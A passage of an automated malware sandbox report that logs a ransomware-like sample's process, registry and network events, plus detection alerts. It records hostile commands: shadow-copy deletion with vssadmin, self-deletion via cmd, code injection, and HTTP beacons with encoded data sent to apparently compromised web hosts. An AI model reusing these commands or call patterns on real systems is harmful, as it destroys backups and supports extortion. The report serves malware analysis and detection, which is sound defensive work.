- apiname: Sleep
- address: 0x0041ed5b
- process:
- timestamp: 218014
- mode: opened
- sequenceNumber: 2660
- desiredaccess: 0x02000030
- ntstatus: 0xc0000022
- target:
- processinfo:
- pid: 4
- tid: 0
- imagepath: N/A
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- apicall:
- timestamp: 218410
- sequenceNumber: 2661
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: Shell32.dll
- apiname: ShellExecuteW
- address: 0x0041f497
- params:
- param (id:1): 0x0
- param (id:2): open
- param (id:3): C:\Users\Administrator\Desktop\Howto_RESTORE_FILES.bmp
- param (id:4): NULL
- param (id:5): NULL
- param (id:6): 1
- process:
- timestamp: 218806
- mode: opened
- sequenceNumber: 2662
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2308
- imagepath: C:\Windows\System32\svchost.exe
- md5sum: c78655bc80301d76ed4fef1c1ea40a7d
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 218811
- mode: opened
- sequenceNumber: 2663
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2308
- imagepath: C:\Windows\System32\svchost.exe
- md5sum: c78655bc80301d76ed4fef1c1ea40a7d
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 218816
- mode: opened
- sequenceNumber: 2664
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2308
- imagepath: C:\Windows\System32\svchost.exe
- md5sum: c78655bc80301d76ed4fef1c1ea40a7d
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 218821
- mode: opened
- sequenceNumber: 2665
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2308
- imagepath: C:\Windows\System32\svchost.exe
- md5sum: c78655bc80301d76ed4fef1c1ea40a7d
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 219088
- mode: setval
- sequenceNumber: 2666
- value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\"{FFE2A43C-56B9-4BF5-9A79-CC6D4285608A} {00000122-0000-0000-C000-000000000046} 0xFFFF" = 01 00 00 00 00 00 00 00 20 fd cc 5c 20 2f d1 01
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 220863
- mode: opened
- sequenceNumber: 2667
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2028
- tid: 0
- imagepath: N\AB
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 220869
- mode: opened
- sequenceNumber: 2668
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2028
- tid: 0
- imagepath: N\AB
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 220904
- mode: opened
- sequenceNumber: 2669
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2028
- imagepath: C:\Windows\SysWOW64\WerFault.exe
- md5sum: 5feab868caedbbd1b7a145ca8261e4aa
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 220918
- mode: opened
- sequenceNumber: 2670
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2028
- imagepath: C:\Windows\SysWOW64\WerFault.exe
- md5sum: 5feab868caedbbd1b7a145ca8261e4aa
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- regkey:
- timestamp: 220997
- mode: setval
- sequenceNumber: 2671
- value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Direct3D\MostRecentApplication\"Name" = juehk-a.exe
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- uac:
- timestamp: 221327
- mode: service
- sequenceNumber: 2672
- value: Windows Error Reporting Service
- status: running
- process:
- timestamp: 221900
- mode: opened
- sequenceNumber: 2673
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2512
- imagepath: C:\Windows\SysWOW64\dllhost.exe
- md5sum: a63dc5c2ea944e6657203e0c8edeaf61
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 221907
- mode: opened
- sequenceNumber: 2674
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2512
- imagepath: C:\Windows\SysWOW64\dllhost.exe
- md5sum: a63dc5c2ea944e6657203e0c8edeaf61
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 221913
- mode: opened
- sequenceNumber: 2675
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2512
- imagepath: C:\Windows\SysWOW64\dllhost.exe
- md5sum: a63dc5c2ea944e6657203e0c8edeaf61
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 221919
- mode: opened
- sequenceNumber: 2676
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2512
- imagepath: C:\Windows\SysWOW64\dllhost.exe
- md5sum: a63dc5c2ea944e6657203e0c8edeaf61
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 222414
- mode: opened
- sequenceNumber: 2677
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1728
- imagepath: C:\Windows\System32\conhost.exe
- md5sum: 402b44b31c7183fcf2c4e1083af317fa
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 222420
- mode: opened
- sequenceNumber: 2678
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1728
- imagepath: C:\Windows\System32\conhost.exe
- md5sum: 402b44b31c7183fcf2c4e1083af317fa
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 222467
- mode: opened
- sequenceNumber: 2679
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1728
- imagepath: C:\Program Files (x86)\Debugging Tools for Windows (x86)\cdb.exe
- md5sum: 7e45b80edb9e3facb344aae59eb09c18
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 222473
- mode: opened
- sequenceNumber: 2680
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1728
- imagepath: C:\Program Files (x86)\Debugging Tools for Windows (x86)\cdb.exe
- md5sum: 7e45b80edb9e3facb344aae59eb09c18
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 222935
- mode: opened
- sequenceNumber: 2681
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2824
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 222942
- mode: opened
- sequenceNumber: 2682
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2824
- imagepath: C:\Windows\System32\conhost.exe
- md5sum: 402b44b31c7183fcf2c4e1083af317fa
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 222948
- mode: opened
- sequenceNumber: 2683
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2824
- imagepath: C:\Windows\System32\conhost.exe
- md5sum: 402b44b31c7183fcf2c4e1083af317fa
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 222990
- mode: opened
- sequenceNumber: 2684
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2824
- imagepath: C:\Windows\System32\conhost.exe
- md5sum: 402b44b31c7183fcf2c4e1083af317fa
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 223837
- mode: opened
- sequenceNumber: 2685
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2804
- imagepath: C:\Windows\System32\dllhost.exe
- md5sum: a8edb86fc2a4d6d1285e4c70384ac35a
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 223843
- mode: opened
- sequenceNumber: 2686
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2804
- imagepath: C:\Windows\System32\dllhost.exe
- md5sum: a8edb86fc2a4d6d1285e4c70384ac35a
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 223854
- mode: opened
- sequenceNumber: 2687
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2804
- imagepath: C:\Windows\System32\dllhost.exe
- md5sum: a8edb86fc2a4d6d1285e4c70384ac35a
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 223861
- mode: opened
- sequenceNumber: 2688
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2804
- imagepath: C:\Windows\System32\dllhost.exe
- md5sum: a8edb86fc2a4d6d1285e4c70384ac35a
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- codeinjection:
- timestamp: 224177
- suppressed: true
- mode: multiple memory write with inline-hook code injection
- sequenceNumber: 2689
- source:
- tainted: false
- processinfo:
- pid: 2824
- imagepath: C:\Windows\System32\conhost.exe
- md5sum: 402b44b31c7183fcf2c4e1083af317fa
- target:
- tainted: true
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- malicious-alert:
- classtype: Code-Injection-Tracking
- weight: 0
- ruleid: 4602 : Code injection detected ; Code injection with suppression
- msg: Code injection with suppression
- display-msg: Code injection detected
- codeinjection:
- timestamp: 224183
- suppressed: true
- mode: multiple memory write with inline-hook code injection
- sequenceNumber: 2690
- source:
- tainted: false
- processinfo:
- pid: 2824
- imagepath: C:\Windows\System32\conhost.exe
- md5sum: 402b44b31c7183fcf2c4e1083af317fa
- target:
- tainted: true
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- apicall:
- timestamp: 225143
- sequenceNumber: 2691
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: Shell32.dll
- apiname: ShellExecuteW
- address: 0x0041f5dd
- params:
- param (id:1): 0x0
- param (id:2): NULL
- param (id:3): C:\Windows\system32\cmd.exe
- param (id:4): /c DEL C:\Users\ADMINI~1\AppData\Roaming\juehk-a.exe
- param (id:5): NULL
- param (id:6): 0
- network:
- timestamp: 225219
- mode: http_request
- sequenceNumber: 2692
- processinfo:
- tainted: true
- pid: 1648
- imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: tcp
- destination_port: 80
- ipaddress: 199.16.199.5
- http_request: GET /wp-content/uploads/misc.php?572A56481F78D91A71F483FAC3626A6FC5C708BDC824ACC227CE0530C84EF5BCE71B9E1E14170D30ACA2D344FC20505D35A28EF4E28528AFD6B56D335E0FD40842FB4AB9B95EA8FD98C09DDC5E111D272EAAB3AC23FEACF99A9A7FD33C676EDEACADD35883E9789A900F3641C335094F39EF6F25FB508FA23DCDD573C83EBBFEB0BCD94CBA057602A5703ED6206E87E7DB70C8CC03F61F2299260854A45EAAE14E6E70094647476269CF41767F02716BE08852FE10456D118C7FA933778F4D1CD84A5D344B228FE307F77FE3F18F2518B2549F2C4C7E3469E3880EF4F4F82EACB474F0B8AE365D1CA75F6B8EBEF44B1D1DA5AF46C788C01927854B19E8475C72A63DE2B6A80E22A7F37E855314A5E588C6B0517357E9480DC9DB06524075011297CBD8864445FDA7C2F7505C1BB9DA47AE928C9DE93367A2314E786363012367D62ECC46F7FC2ADA9A210D6C88E6EEB87106485BCF233BC6AF49AE07C1A0190DB5423D357D862E7BBFE7F6F8151E6580 HTTP/1.1~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko~~Host: aprenderabailarsevillanas.com~~Connection: Keep-Alive~~~~
- network:
- timestamp: 225231
- mode: http_request
- sequenceNumber: 2693
- processinfo:
- tainted: true
- pid: 1648
- imagepath: c:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- protocol_type: tcp
- destination_port: 80
- ipaddress: 199.16.199.7
- http_request: GET /sysmisc.php?572A56481F78D91A71F483FAC3626A6FC5C708BDC824ACC227CE0530C84EF5BCE71B9E1E14170D30ACA2D344FC20505D35A28EF4E28528AFD6B56D335E0FD40842FB4AB9B95EA8FD98C09DDC5E111D272EAAB3AC23FEACF99A9A7FD33C676EDEACADD35883E9789A900F3641C335094F39EF6F25FB508FA23DCDD573C83EBBFEB0BCD94CBA057602A5703ED6206E87E7DB70C8CC03F61F2299260854A45EAAE14E6E70094647476269CF41767F02716BE08852FE10456D118C7FA933778F4D1CD84A5D344B228FE307F77FE3F18F2518B2549F2C4C7E3469E3880EF4F4F82EACB474F0B8AE365D1CA75F6B8EBEF44B1D1DA5AF46C788C01927854B19E8475C72A63DE2B6A80E22A7F37E855314A5E588C6B0517357E9480DC9DB065240750112431793F594CAA0CC5A672A93EDB92617B4D267F2343E1AB4D349856F8F20868BA3DE5172593378D266301A16212F66328D335ADC1EA15B0091B1716DA373C1F9 HTTP/1.1~~User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko~~Host: woodenden.com~~Connection: Keep-Alive~~~~
- apicall:
- timestamp: 225246
- sequenceNumber: 2694
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: GetSystemDirectoryW
- address: 0x75f92cf2
- params:
- param (id:1): 0x420fa60
- param (id:2): 260
- process:
- timestamp: 225484
- mode: started
- sequenceNumber: 2695
- value: C:\Windows\System32\vssadmin.exe
- pid: 2792
- ppid: 1648
- parentname: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- cmdline: "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet
- filesize: 167424
- md5sum: e23dd973e1444684eb36365deff1fc74
- sha1sum: 09fafeb1b8404124b33c44440be7e3fdb6105f8a
- ads:
- fid (ads:): 281474976737319
- process:
- timestamp: 225491
- mode: opened
- sequenceNumber: 2696
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2792
- imagepath: C:\Windows\System32\vssadmin.exe
- md5sum: e23dd973e1444684eb36365deff1fc74
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 225497
- mode: opened
- sequenceNumber: 2697
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2792
- imagepath: C:\Windows\System32\vssadmin.exe
- md5sum: e23dd973e1444684eb36365deff1fc74
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 225511
- mode: opened
- sequenceNumber: 2698
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1012
- tid: 0
- imagepath: N\AB
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 225516
- mode: started
- sequenceNumber: 2699
- value: C:\Windows\SysWOW64\cmd.exe
- pid: 1012
- ppid: 1648
- parentname: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- cmdline: "C:\Windows\system32\cmd.exe" /c DEL C:\Users\ADMINI~1\AppData\Roaming\juehk-a.exe
- filesize: 302592
- md5sum: ad7b9c14083b52bc532fba5948342b98
- sha1sum: ee8cbf12d87c4d388f09b4f69bed2e91682920b5
- ads:
- fid (ads:): 281474976780679
- process:
- timestamp: 225531
- mode: opened
- sequenceNumber: 2700
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2792
- imagepath: C:\Windows\System32\vssadmin.exe
- md5sum: e23dd973e1444684eb36365deff1fc74
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 225536
- mode: opened
- sequenceNumber: 2701
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1012
- imagepath: C:\Windows\SysWOW64\cmd.exe
- md5sum: ad7b9c14083b52bc532fba5948342b98
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 225541
- mode: opened
- sequenceNumber: 2702
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 2792
- imagepath: C:\Windows\System32\vssadmin.exe
- md5sum: e23dd973e1444684eb36365deff1fc74
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 225546
- mode: opened
- sequenceNumber: 2703
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1012
- imagepath: C:\Windows\SysWOW64\cmd.exe
- md5sum: ad7b9c14083b52bc532fba5948342b98
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 225551
- mode: opened
- sequenceNumber: 2704
- desiredaccess: 0x02000030
- ntstatus: 0x00000000
- target:
- processinfo:
- pid: 1012
- imagepath: C:\Windows\SysWOW64\cmd.exe
- md5sum: ad7b9c14083b52bc532fba5948342b98
- source:
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- process:
- timestamp: 225519
- mode: terminated
- sequenceNumber: 2705
- value: C:\Windows\SysWOW64\cmd.exe
- pid: 1012
- ppid: 1648
- parentname: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- cmdline: N/A
- ads:
- fid (ads:): 281474976780679
- process:
- timestamp: 226076
- mode: terminated
- sequenceNumber: 2706
- value: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- pid: 1648
- ppid: 2824
- parentname: C:\Windows\System32\conhost.exe
- cmdline: N/A
- ads:
- fid (ads:): 3096224743903578
- end-of-report:
- sequenceNumber: 2707
- malicious-alert:
- classtype: Suspicious-Persistance-Activity
- weight: 0
- ruleid: 2221 : New file in AppData added to Run regkey ; Process drops a file in AppData then adds to Run regkey
- msg: Process drops a file in AppData then adds to Run regkey
- display-msg: New file in AppData added to Run regkey
- malicious-alert:
- classtype: misc-anom
- weight: 100
- ruleid: 10055 : Suspicious Persistence Activity ; Suspicious Persistence Activity
- msg: Suspicious Persistence Activity
- display-msg: Suspicious Persistence Activity
- malicious-alert:
- classtype: misc-anom
- weight: 100
- ruleid: 10120 : Suspicious Code Injection Activity ; Suspicious Code Injection Activity
- msg: Suspicious Code Injection Activity
- display-msg: Suspicious Code Injection Activity
- malicious-alert:
- classtype: misc-anom
- weight: 100
- ruleid: 10005 : Code Injection Activity ; Code Injection Activity
- msg: Code Injection Activity
- display-msg: Code Injection Activity
- malicious-alert:
- classtype: Generic-Anomalous-Activity
- weight: 0
- ruleid: 8018 : Process Opening explorer ; Process Opening Explorer
- msg: Process Opening Explorer
- display-msg: Process Opening explorer
- malicious-alert:
- classtype: misc-anom
- weight: 100
- ruleid: 10072 : Process Open with Root process deleted ; Process deleting itself
- msg: Process deleting itself
- display-msg: Process Open with Root process deleted
- malicious-alert:
- classtype: Suspicious-Persistance-Activity
- weight: 0
- ruleid: 4411 : Startup services added for file ; Process adding itself (non-DLL) to windows startup areas for file
- msg: Process adding itself (non-DLL) to windows startup areas for file
- display-msg: Startup services added for file
- os-changes (id:97484):
- osinfo: Microsoft WindowsXP 32-bit 5.1 sp3 15.0826
- version: 1.1290
- analysis:
- sequenceNumber: 1
- product: MPS
- ftype: exe
- mode: malware
- version: 1.1290
- application:
- app-name: Windows Explorer
- sequenceNumber: 2
- os (name:windows):
- version: 5.1.2600
- arch: x86
- sequenceNumber: 3
- sp: 3
- os_monitor:
- date: Aug 13 2015
- version: 15R1
- build: 403692
- sequenceNumber: 4
- time: 17:02:35
- config-update:
- timestamp: 16
- sequenceNumber: 5
- status: success
- update-requested: false
- version: 1.01
- uac:
- timestamp: 7002
- mode: service
- sequenceNumber: 6
- value: Telephony
- status: running
- uac:
- timestamp: 12017
- mode: service
- sequenceNumber: 7
- value: Remote Access Connection Manager
- status: running
- process:
- timestamp: 44051
- mode: started
- sequenceNumber: 8
- value: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- pid: 1824
- ppid: 2684
- parentname: C:\WINDOWS\explorer.exe
- cmdline: "C:\DOCUME~1\admin\LOCALS~1\Temp\73.exe"
- filesize: 364544
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- sha1sum: 8d149bc90e10db7571379dc0e62409cdcfb7427c
- ads:
- fid (ads:): 3096224743826754
- file:
- timestamp: 44175
- mode: failed
- sequenceNumber: 9
- value: C:\DOCUME~1\admin\LOCALS~1\Temp\LPK.DLL
- processinfo:
- tainted: true
- pid: 1824
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 44184
- mode: failed
- sequenceNumber: 10
- value: C:\DOCUME~1\admin\LOCALS~1\Temp\USP10.dll
- processinfo:
- tainted: true
- pid: 1824
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- regkey:
- randomized: true
- mode: queryvalue
- sequenceNumber: 11
- timestamp: 44191
- value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
- processinfo:
- pid: 1824
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 44304
- mode: failed
- sequenceNumber: 12
- value: C:\WINDOWS\aRu2Yo48qPE
- processinfo:
- pid: 1824
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x60
- file:
- timestamp: 44730
- mode: failed
- sequenceNumber: 13
- value: C:\WINDOWS\Fonts\FQ2SznG21IEC5G4
- processinfo:
- pid: 1824
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 44736
- mode: failed
- sequenceNumber: 14
- value: C:\DOCUME~1\admin\LOCALS~1\Temp\FQ2SznG21IEC5G4
- processinfo:
- pid: 1824
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 44746
- mode: failed
- sequenceNumber: 15
- value: C:\WINDOWS\system32\FQ2SznG21IEC5G4
- processinfo:
- pid: 1824
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 44751
- mode: failed
- sequenceNumber: 16
- value: C:\WINDOWS\system\FQ2SznG21IEC5G4
- processinfo:
- pid: 1824
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 44756
- mode: failed
- sequenceNumber: 17
- value: C:\WINDOWS\FQ2SznG21IEC5G4
- processinfo:
- pid: 1824
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 44763
- mode: failed
- sequenceNumber: 18
- value: C:\WINDOWS\system32\wbem\FQ2SznG21IEC5G4
- processinfo:
- pid: 1824
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 44768
- mode: failed
- sequenceNumber: 19
- value: C:\Program Files\QuickTime\QTSystem\FQ2SznG21IEC5G4
- processinfo:
- pid: 1824
- imagepath: C:\Documents and Settings\admin\Local Settings\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- file:
- timestamp: 44773
- mode: failed
- sequenceNumber: 20
